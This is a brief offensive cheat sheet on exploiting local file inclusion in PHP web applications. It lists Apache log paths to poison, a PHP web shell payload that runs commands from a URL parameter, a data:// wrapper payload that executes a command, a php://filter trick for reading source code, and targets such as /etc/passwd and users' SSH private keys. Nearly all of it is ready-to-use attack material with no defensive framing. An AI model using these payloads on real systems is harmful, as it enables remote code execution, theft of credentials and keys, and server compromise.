- Contaminating Log Files
- Enumerate users /etc/passwd
- Check for ssh keys /home/user/.ssh/id_rsa
- Check for RFI
WIndows logs file for contaminations (Apache)
c:\xampp\apache\logs\access.log
c:\xampp\apache\logs\error.log
Linux logs file for contaminations (Apache)
/var/log/apache2/access.log
/var/log/apache2/error.log
PHP Contamination payload
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
PHP Wrappers payload
http://example.com/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
PHP Base64 Filter
php://filter/convert.base64-encode/resource=/var/www/html/admin.php